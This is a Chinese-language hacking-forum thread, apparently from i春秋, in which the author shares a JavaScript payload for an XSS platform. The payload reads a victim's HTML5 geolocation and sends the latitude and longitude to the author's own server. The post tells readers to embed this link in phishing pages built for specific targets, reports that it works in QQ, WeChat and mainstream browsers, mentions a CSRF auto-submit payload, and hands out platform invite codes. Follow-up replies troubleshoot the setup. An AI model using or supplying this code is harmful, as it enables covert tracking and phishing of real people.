用户
搜索
  • TA的每日心情
    擦汗
    2018-2-13 09:36
  • 签到天数: 36 天

    连续签到: 1 天

    [LV.5]常住居民I

    i春秋作家

    春秋认证√作家团颜值担当

    Rank: 7Rank: 7Rank: 7

    11

    主题

    338

    帖子

    1356

    魔法币
    收听
    1
    粉丝
    28
    注册时间
    2017-6-5

    i春秋签约作者春秋文阁秦

    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋签约作者 春秋文阁 秦 楼主
    发表于 2018-2-3 10:57:14 1227309
    之前有表哥写过利用H5技术的GPS定位,也有其他表哥打造了个简易的专门利用H5获取GPS经纬度的平台。

    前者我代码测试存在一些未知原因,总是出问题。后者我觉得为了个GPS定位专门搭建个平台无必要,还需要自己的服务器,而多数人使用大概也仅限于偶尔配合钓鱼网站社工精确地理位置。

    总而言之对小白都不太友好,使用也不方便。

    Onls看了下代码原理,发现归根结底就是利用H5自带的GPS对象,通过JavaScript来获取和处理经纬度信息,那么我觉得,最适合的方式应该是像使用XSS平台打Cookie那样,将利用代码抽象成一段js外链,大家不用管它具体是如何执行的,只需要在自己的钓鱼页面中引入这段js外链即可,类似于大家平时XSS插的:<script src="https://xss.com/xss"></script>,不需要额外的特殊操作。

    XSS平台用法就不介绍了,我这用的是开源代码搭建在自己服务器的XSS平台,(支持http和https):https://0bug.cf

    1.png


    你们如果有自己常用的XSS平台的话,就去自己的XSS平台创建项目:

    代码:
    [JavaScript] 纯文本查看 复制代码
    function getLocation() //获取GPS定位方法
      {
      if (navigator.geolocation)
        {
        navigator.geolocation.getCurrentPosition(showPosition);
        }
      else{x.innerHTML="Geolocation is not supported by this browser.";}
      }
    function showPosition(position)
      {
    //alert("Latitude: " + position.coords.latitude + "Longitude: " + position.coords.longitude); //测试,注释掉
        (new Image()).src='https://0bug.cf/index.php?do=api&id={projectId}&weidu='+position.coords.latitude+'&jingdu='+position.coords.longitude; //向XSS平台发送经纬度信息
    }
          
    getLocation();


    在XSS平台上创建项目的时候,设置两个参数:

    2.png


    完成之后将XSS平台生成的外链插入自己准备好的钓鱼页面中就行了,Demo:https://0bug.cf/gps.html (手机打开,电脑没有GPS)




    3.png

    只需要在使用的时候构造针对特定目标的钓鱼页面,然后插入同一段已生产好的JS外链就够了。会自动接受经纬度并邮件提醒,实测QQ\微信\各主流浏览器都成功。

    4.png

    -------------------------------------------分割线----------------------------------------------

    主要因为我之前那篇社工锁机病毒和CSRF实战讲解文章后面有很多小伙伴私聊我怎么用XSS平台来做,还有些问CSRF怎么代码自提交的,无法一 一回复,故总结在这篇文章里,下面是利用XSS平台来做CSRF外链:

    利用XSS平台做CSRF POST方法隐藏表单后台自提交通用代码,能知道对方点击了链接并且还能得到对方IP:

    游客,如果您要查看本帖隐藏内容请回复


    对CSRF不理解的可以看其他表哥关于这方面的文章,或者我这篇:


    [Onls丶辜釉渗透日常]花式实战助你理解CSRF

    如果自己没有XSS平台的,可以在本帖下面留言,我给你我平台的邀请码,不过为了保持稳定数量有限。






    评分

    参与人数 1积分 +50 魔法币 +10 收起 理由
    叶问 + 50 + 10 表哥能送一个邀请码吗

    查看全部评分

    信息安全菜鸟/社会主义接班人
    onls辜釉 发表于 2018-2-5 16:05
    已经设为公共模块了,你看下

    折腾了好久,换了个安卓手机结果能获取到经纬度了…………我看你截图的情况,也是Iphone访问的,为啥我的iphone不行呢 你做特殊设置了吗
    使用道具 举报 回复
    onls辜釉 发表于 2018-2-5 12:07
    XSS平台要支持https

    我用的是你的XSS平台,但是还是获取不到经纬度。
    大神能不能截一下你XSS平台里面配置模块里面代码的图,我对比一下代码,万分感谢
    使用道具 举报 回复
    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋签约作者 春秋文阁 秦
    推荐
    发表于 2018-2-8 16:11:58
    Behindyours 发表于 2018-2-8 01:55
    折腾了好久,换了个安卓手机结果能获取到经纬度了…………我看你截图的情况,也是Iphone访问的,为啥我的 ...

    没有阿  你可能缺一台iPhoneX
    信息安全菜鸟/社会主义接班人
    使用道具 举报 回复
    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋签约作者 春秋文阁 秦
    推荐
    发表于 2018-2-5 16:05:27
    Behindyours 发表于 2018-2-5 07:33
    我用的是你的XSS平台,但是还是获取不到经纬度。
    大神能不能截一下你XSS平台里面配置模块里面代码的图, ...

    已经设为公共模块了,你看下
    信息安全菜鸟/社会主义接班人
    使用道具 举报 回复
    本帖最后由 Behindyours 于 2018-2-5 11:48 编辑

    我按这个创建的,但是xss平台收不到信息。
    我又测试了一下用默认模版获取cookie,结果是可以收到的。
    是不是获取经纬度代码有点问题
    2.jpg
    使用道具 举报 回复
    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋签约作者 春秋文阁 秦
    推荐
    发表于 2018-2-5 12:07:03
    Behindyours 发表于 2018-2-5 03:46
    我按这个创建的,但是xss平台收不到信息。
    我又测试了一下用默认模版获取cookie,结果是可以收到的。
    是不 ...

    XSS平台要支持https
    信息安全菜鸟/社会主义接班人
    使用道具 举报 回复
    感谢分享
    使用道具 举报 回复
    发表于 2018-2-3 11:16:22
    谢谢大神分享,学习了
    使用道具 举报 回复
    发表于 2018-2-3 13:34:18
    表哥骚得不行。
    使用道具 举报 回复
    发表于 2018-2-3 13:43:48

    表哥骚得不行。
    使用道具 举报 回复
    感谢分享。。。。。。
    使用道具 举报 回复
    先收藏了,又是表哥的骚操作
    使用道具 举报 回复
    发表于 2018-2-3 19:20:14
    求邀请码
    使用道具 举报 回复
    onls辜釉 i春秋作家 春秋认证√作家团颜值担当 i春秋签约作者 春秋文阁 秦
    8#
    发表于 2018-2-3 19:55:20

    7238729a8fec136a31fdf59c2e179816
    信息安全菜鸟/社会主义接班人
    使用道具 举报 回复
    发表于 2018-2-3 20:29:16
    看看啊啊                 
    使用道具 举报 回复
    发表于 2018-2-3 20:37:49
    收藏了 学习下
    使用道具 举报 回复
    网页从来不授权获取地理位置
    使用道具 举报 回复
    发表于 2018-2-3 22:08:47
    6666666666666666666666666666666666
    使用道具 举报 回复
    发表于 2018-2-4 19:14:51
    有没有跳转链接的xss代码
    使用道具 举报 回复
    发表于 2018-2-4 19:28:52
    感谢表格的分享
    你所浪费的今天,是昨天死去的人奢望的明天。
    使用道具 举报 回复
    您需要登录后才可以回帖 登录 | 立即注册